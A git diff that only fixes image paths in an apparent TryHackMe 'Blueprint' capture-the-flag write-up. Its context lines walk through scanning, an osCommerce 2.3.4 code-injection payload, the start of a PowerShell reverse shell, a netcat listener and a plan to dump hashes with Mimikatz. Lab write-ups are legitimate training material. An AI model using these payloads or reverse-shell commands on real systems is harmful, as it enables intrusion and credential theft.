--- a/TryHackMe/Blueprint/Blueprint.html
+++ b/TryHackMe/Blueprint/Blueprint.html
@@ -48,7 +48,7 @@ ping 10.10.118.119
 
 <p>The output should look like:</p>
 
-<p><img src="TryHackMe/Blueprint/images/1.png" alt="" /></p>
+<p><img src="./images/1.png" alt="" /></p>
 
 <p>Add your ip address to <code>/etc/hosts</code> file.</p>
 
@@ -58,7 +58,7 @@ nano /etc/host
 
 <p>Include your ip address the format provided below:</p>
 
-<p><img src="TryHackMe/Blueprint/images/2.png" alt="" /></p>
+<p><img src="./images/2.png" alt="" /></p>
 
 <p>Before move on, I highly recommend you to check manually whether <code>web application</code> runs on <code>port 80/443</code> via browser. In most scenarios, we will not have https protocol.</p>
 
@@ -69,7 +69,7 @@ http://blueprint.thm
 
 <p>This route automatically interact with HTTP protocol. Most of the time browsers have default routing mechanism directing to port 443. We should always try to route port 80 by just manually adding <code>http://</code></p>
 
-<p><img src="TryHackMe/Blueprint/images/3.png" alt="" /></p>
+<p><img src="./images/3.png" alt="" /></p>
 
 <p>Recently, I also tried to check <code>Apache</code> commonly running on port 8080:</p>
 
@@ -77,7 +77,7 @@ http://blueprint.thm
 
 <p>As you can see above, we have an directory named <code>oscommerce-2.3.4</code>. I was curious about it ,so I searched about our Operating System commerce app.</p>
 
-<p><img src="TryHackMe/Blueprint/images/5.png" alt="" /></p>
+<p><img src="./images/5.png" alt="" /></p>
 
 <p>It is clear that we should trigger RCE through web app. However, further reconnaissance is not harmful :) I also wanted to <code>fuzz</code> this route <code>http://blueprint:8080</code></p>
 
@@ -89,15 +89,15 @@ http://blueprint.thm
 dirsearch -u http://blueprint.thm:8080
 </code></p>
 
-<p><img src="TryHackMe/Blueprint/images/6.png" alt="" /></p>
+<p><img src="./images/6.png" alt="" /></p>
 
 <p>I just got <code>/server-status/</code>, <code>/server-info</code> paths. Capturing server data is useful for the architectural understanding. Let me extract what we have so far !</p>
 
-<p><img src="TryHackMe/Blueprint/images/7.png" alt="" /></p>
+<p><img src="./images/7.png" alt="" /></p>
 
 <p>I was dealing with <code>Win32</code> architecture, <code>Apache</code> as a web server and for the backend <code>PHP</code> working on the machine. Furthermore, on <code>/oscommerce-2.3.4/docs/</code> path, there was a database dump. However, I could not reach any juicy information.</p>
 
-<p><img src="TryHackMe/Blueprint/images/8.png" alt="" /></p>
+<p><img src="./images/8.png" alt="" /></p>
 
 <p>The <code>database scheme</code> pattern looks like <code>ER diagram</code>.</p>
 
@@ -112,11 +112,11 @@ sudo nmap -sV -sC blueprint.thm</p>
 
 <p>Since I have already get what we need especially architecture of the application. I preferred to use only <code>default script</code> scan. Moreover, full port scan was not compatible on this scenario because it ran really slow. Anyway, let's check the <code>network mapper</code> output.</p>
 
-<p><img src="TryHackMe/Blueprint/images/9.png" alt="" /></p>
+<p><img src="./images/9.png" alt="" /></p>
 
 <p>The results depicted that I did not check only the port <code>445</code> as known as <code>SMB</code> (Server Message Block).</p>
 
-<p><img src="TryHackMe/Blueprint/images/10.png" alt="" /></p>
+<p><img src="./images/10.png" alt="" /></p>
 
 <p><code>Nmap</code> script engine automatically run <code>default smb scripts</code> against on target. Lastly, checking the SMB will be crucial to get initial compromise since <code>nmap</code> script result revealed the potential discovery on <code>SMB</code>.</p>
 
@@ -124,7 +124,7 @@ sudo nmap -sV -sC blueprint.thm</p>
 
 <p><a href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb">Pentesting SMB</a></p>
 
-<p><img src="TryHackMe/Blueprint/images/11.png" alt="" /></p>
+<p><img src="./images/11.png" alt="" /></p>
 
 <p><code>
 enum4linux -a 10.10.118.119
@@ -132,11 +132,11 @@ enum4linux -a 10.10.118.119
 
 <p>The most identical part of the <code>enum4linux</code> output was the <code>nbtstat information</code>.</p>
 
-<p><img src="TryHackMe/Blueprint/images/12.png" alt="" /></p>
+<p><img src="./images/12.png" alt="" /></p>
 
 <p>Script could get the <code>Domain/Workgroup</code> named <code>WORKGROUP</code>. Let me try to authenticate it through without giving credentials.</p>
 
-<p><img src="TryHackMe/Blueprint/images/13.png" alt="" /></p>
+<p><img src="./images/13.png" alt="" /></p>
 
 <p><code>
     //IPC$ did not allow me to run any commands
@@ -156,7 +156,7 @@ enum4linux -a 10.10.118.119
 
 <p><a href="https://www.exploit-db.com/exploits/44374">RCE</a></p>
 
-<p><img src="TryHackMe/Blueprint/images/14.png" alt="" /></p>
+<p><img src="./images/14.png" alt="" /></p>
 
 <p>There was a web app based vulnerability occurs ,so let me apply this manually before I demonstrate all the ways to compromise machine.</p>
 
@@ -169,17 +169,17 @@ enum4linux -a 10.10.118.119
 <p>Firstly, edit the 
 <code>url</code> part of the script:</p>
 
-<p><img src="TryHackMe/Blueprint/images/16.png" alt="" /></p>
+<p><img src="./images/16.png" alt="" /></p>
 
 <p>As you can see below, it did not work because the script automatically tried to execute <code>system('ls')</code> command on the OS.</p>
 
-<p><img src="TryHackMe/Blueprint/images/17.png" alt="" /></p>
+<p><img src="./images/17.png" alt="" /></p>
 
 <p>However, the web app disabled such commands by default ,so lets run another payload from <a href="https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution">Github</a></p>
 
 <p>To understand how the script works, I initially ran it just by giving any parameters and inputs.</p>
 
-<p><img src="TryHackMe/Blueprint/images/18.png" alt="" /></p>
+<p><img src="./images/18.png" alt="" /></p>
 
 <p>Payload that I have used:</p>
 
@@ -195,11 +195,11 @@ python3 osCommerce2_3_4RCE.py http://10.10.31.69:8080/oscommerce-2.3.4/catalog
 '); passthru('whoami'); /*
 </code></p>
 
-<p><img src="TryHackMe/Blueprint/images/19.png" alt="" /></p>
+<p><img src="./images/19.png" alt="" /></p>
 
 <p>Although there were not any privilege execution mechanism on script, I had straightforwardly get <code>NT AUTHORITY\SYSTEM</code>. However, still I could not move any paths directly on <code>OS</code>.</p>
 
-<p><img src="TryHackMe/Blueprint/images/20.png" alt="" /></p>
+<p><img src="./images/20.png" alt="" /></p>
 
 <p>Hence, I also wanted to try again <a href="https://www.exploit-db.com/exploits/44374"><code>Exploit Db</code></a> Maybe I can upgrade my shell with <code>Powershell reverse shell</code>. Because of the script's iteration. I was not able to interact with shell properly. It only allowed me to show <code>current directory</code>.</p>
 
@@ -218,13 +218,13 @@ powershell -NoProfile -Command "$client = New-Object System.Net.Sockets.TCPClien
 nc -lvnp 4444
 </code></p>
 
-<p><img src="TryHackMe/Blueprint/images/21.png" alt="" /></p>
+<p><img src="./images/21.png" alt="" /></p>
 
 <p>You can directly paste when you prepare your payload as above. Then switch on the shell that you spawned.</p>
 
 <p>You should wait at least <code>15 seconds</code> to ensure ready your upgraded <code>reverse shell</code>. That's all ! !</p>
 
-<p><img src="TryHackMe/Blueprint/images/22.png" alt="" /></p>
+<p><img src="./images/22.png" alt="" /></p>
 
 <p>To get <code>LAB</code> user flag, you should use <code>Mimikatz</code> to get the <code>NTLM</code> hash of the user.</p>
 
@@ -237,7 +237,7 @@ python -m http.server 3131
 
 <p>Since the target is x86 device known as 32bit:</p>
 
-<p><img src="TryHackMe/Blueprint/images/24.png" alt="" /></p>
+<p><img src="./images/24.png" alt="" /></p>
 
 <p>Using <code>mimikatz32.exe</code> is compatible for us. </p>
 
